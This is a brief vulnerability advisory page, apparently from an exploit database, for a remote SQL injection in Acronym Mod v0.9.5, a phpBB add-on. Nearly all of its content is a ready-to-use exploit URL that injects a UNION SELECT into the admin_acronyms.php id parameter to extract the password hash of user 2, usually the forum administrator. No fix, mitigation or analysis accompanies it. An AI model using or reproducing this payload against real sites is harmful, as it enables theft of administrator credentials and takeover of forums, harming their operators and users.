Lucene search
SecurityvulnsSECURITYVULNS:DOC:15542HistoryDec 31, 2006 - 12:00 a.m.
Acronym Mod v0.9.5 Remote SQL Injection Vulnerability
2006-12-3100:00:00
vulners.com
21
########################################################################
Acronym Mod v0.9.5 Remote SQL Injection Vulnerability
Download: http://www.codemonkeyx.net
Found By: the master
########################################################################
exploit:
http://[Target]/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
Greetz: str0ke , Dr Max Virus , Kacper
########################################################################